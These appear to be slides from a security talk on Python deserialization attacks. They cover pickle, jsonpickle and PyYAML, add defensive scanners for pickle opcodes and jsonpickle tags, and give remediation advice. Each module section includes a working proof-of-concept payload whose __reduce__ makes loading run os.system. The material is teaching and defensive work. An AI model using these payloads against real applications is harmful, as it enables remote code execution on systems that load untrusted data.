Python Deserialization Attacks
By Manmeet Singh
Date - 28/04/2020
Contents
● Serialization Concept
● Why deserialization tends to become a vulnerability
● Python modules vulnerable to deserialization vulnerabilities
● Pickle Module
● JSONPickle Module
● PyYAML Module
● Remediation
Serialization Concept
Structured data (variables, lists, strings, custom objects) is converted into a stream format, either readable text or unreadable bytes.
Why do we need serialization?
1. Recovery of the original structure.
2. Minimizing bandwidth.
3. Calling class objects.
Where is serialization used?
● Thick client applications and desktop programs, for example Metasploit, PyCharm, IntelliJ IDEA, etc.
● APIs.
● Mobile applications.
Why does deserialization tend to become a vulnerability?
Objects of classes can be serialized... and when they get deserialized, the class objects are rebuilt and carry out their purpose.
Yes, calling any existing class method is possible, even os.system().
Did the developers of serialization libraries know this?
Why was it made, then? To work dynamically with classes: an application's Class A and Class B, together with their methods (def abc(): ...), are rebuilt from the stream.
Python Serialization Modules Vulnerable to Deserialization Vulnerability
● Pickle
● jsonpickle
● PyYAML
● ruamel.yaml
Pickle Module
Pickling is a way to convert a Python object (list, dict, etc.) into a character stream. The idea is that this character stream contains all the information necessary to reconstruct the object in another Python script.
How to pickle and de-pickle?
Serialization using pickle - pickle.dumps(Object)
Deserialization using pickle - pickle.loads(stream)
Detecting use of the pickle module
A pickle byte stream ends with a . (dot).
How to exploit pickle deserialization?
    from pickle import dumps
    import os

    class payload(object):
        # __reduce__ tells pickle how to rebuild this object: call os.system("dir")
        def __reduce__(self):
            return os.system, ("dir",)

    print(dumps(payload()))

On the receiving side, loading the stream runs the call returned by __reduce__:
    from pickle import loads
    loads(stream)   # stream: the untrusted bytes the application received
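The two defensive checks a reviewer would want next to the slide above, as an added example that is not part of the talk: disassembling a pickle stream with pickletools before loading it (a plain-data pickle never needs GLOBAL/REDUCE opcodes), and loading through a restricted Unpickler whose find_class() allowlists the few globals the application expects. The Suspicious class is a constructed sample whose __reduce__ names os.getcwd, a harmless stand-in for the os.system payload.

```python
import io
import os
import pickle
import pickletools

# Opcodes that import a callable by name or invoke one. A pickle of plain
# data (dicts, lists, strings, numbers) never needs any of them.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def risky_opcodes(stream: bytes) -> list:
    """Disassemble a pickle stream WITHOUT executing it and list risky opcodes."""
    return [op.name for op, _arg, _pos in pickletools.genops(stream)
            if op.name in RISKY_OPCODES]


class RestrictedUnpickler(pickle.Unpickler):
    """find_class() is the hook every global lookup goes through; allowlist it
    (the pattern recommended in the Python pickle documentation)."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"),
               ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(stream: bytes):
    return RestrictedUnpickler(io.BytesIO(stream)).load()


class Suspicious:
    """Constructed sample: __reduce__ makes pickle emit a call to os.getcwd()
    (a harmless stand-in for the os.system payload shown in the talk)."""
    def __reduce__(self):
        return os.getcwd, ()


def demo() -> dict:
    benign = pickle.dumps({"user": "alice", "roles": ["admin"]})
    suspicious = pickle.dumps(Suspicious())
    result = {
        "benign_ops": risky_opcodes(benign),          # no risky opcodes at all
        "suspicious_ops": risky_opcodes(suspicious),  # STACK_GLOBAL then REDUCE
        "benign_loaded": restricted_loads(benign),
        # plain loads() executes the __reduce__ call: the "object" is the cwd string
        "plain_loads_ran_call": pickle.loads(suspicious) == os.getcwd(),
    }
    try:
        restricted_loads(suspicious)
        result["suspicious_blocked"] = False
    except pickle.UnpicklingError:
        result["suspicious_blocked"] = True
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The opcode scan is a detection aid, not a substitute for the allowlist: the restricted loader is what actually stops the call.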
JSONPickle Module
jsonpickle serializes complex Python objects to and from JSON. It also converts a pickled object into a human-readable form.
How to jsonpickle and json de-pickle?
Serialization using jsonpickle - jsonpickle.encode(Object)
Deserialization using jsonpickle - jsonpickle.decode(stream)
Detecting use of the jsonpickle module
It looks like a normal JSON stream of data, sometimes with a "py/" tag in it.
How to exploit jsonpickle deserialization?
    from jsonpickle import encode
    import os

    class payload(object):
        # __reduce__ tells jsonpickle how to rebuild this object: call os.system("dir")
        def __reduce__(self):
            return os.system, ("dir",)

    print(encode(payload()))

On the receiving side, decoding the stream runs the call returned by __reduce__:
    from jsonpickle import decode
    decode(stream)   # stream: the untrusted JSON the application received
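The "py/" tag detection mentioned above, turned into a gate a defender can put in front of jsonpickle.decode(); this is an added example, not code from the talk or from jsonpickle. It parses the input with the standard json module only (never with jsonpickle) and flags every key beginning with "py/". The sample documents are constructed; TAGGED mimics the py/reduce structure jsonpickle emits for an object whose __reduce__ names os.getcwd, a harmless stand-in for os.system.

```python
import json

# Every jsonpickle extension to plain JSON is an object key beginning with
# "py/"; "py/object" and "py/reduce" are the ones that make decode() run code.
PY_TAG_PREFIX = "py/"


def find_py_tags(node, path="$"):
    """Walk a parsed JSON document and return (json_path, tag) for every key
    that starts with "py/". Deliberately conservative: any such key is flagged."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if isinstance(key, str) and key.startswith(PY_TAG_PREFIX):
                found.append((path, key))
            found.extend(find_py_tags(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            found.extend(find_py_tags(item, f"{path}[{index}]"))
    return found


def scan(text: str) -> list:
    """Parse with the standard json module (not jsonpickle) and report tags."""
    return find_py_tags(json.loads(text))


def is_plain_json(text: str) -> bool:
    """Gate to apply before jsonpickle.decode(): only tag-free JSON may pass."""
    try:
        return not scan(text)
    except ValueError:
        return False  # not even valid JSON: refuse it


# Constructed samples (not output of the talk's code).
BENIGN = '{"user": "alice", "roles": ["admin", "dev"]}'
TAGGED = ('{"session": {"py/reduce": [{"py/function": "os.getcwd"},'
          ' {"py/tuple": []}]}}')

if __name__ == "__main__":
    print("benign ok:", is_plain_json(BENIGN))
    print("tagged ok:", is_plain_json(TAGGED), scan(TAGGED))
```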
PyYAML Module
The PyYAML Python module is used to serialize objects in YAML (Yet Another Markup Language) format, so this module is used to process YAML data.
● PyYAML version < 5.1 is directly vulnerable (CVE-2017-18342).
● PyYAML version >= 5.1 and < 5.2 is vulnerable under certain conditions (CVE-2019-20477).
● The latest version of PyYAML, 5.3.1, is not vulnerable.
How to YAML serialize and deserialize?
Serialization using PyYAML - yaml.dump(Object)
Deserialization using PyYAML - yaml.load(stream)
Detecting use of the pyyaml/ruamel.yaml modules
The data will be in YAML format.
How to exploit PyYAML deserialization?
    from yaml import dump
    import os

    class payload(object):
        # __reduce__ tells the serializer how to rebuild this object: call os.system("dir")
        def __reduce__(self):
            return os.system, ("dir",)

    print(dump(payload()))

On the receiving side, on the vulnerable versions listed above, loading the document with load() runs that call:
    from yaml import load
    load(stream)   # stream: the untrusted YAML the application received
Remediations
For jsonpickle and pickle, the general take-away is the rule of thumb: "Do not deserialize untrusted data."
For PyYAML:
● Use safe_dump() and safe_load() instead of dump() and load().
● Use the latest version of PyYAML.
Questions ?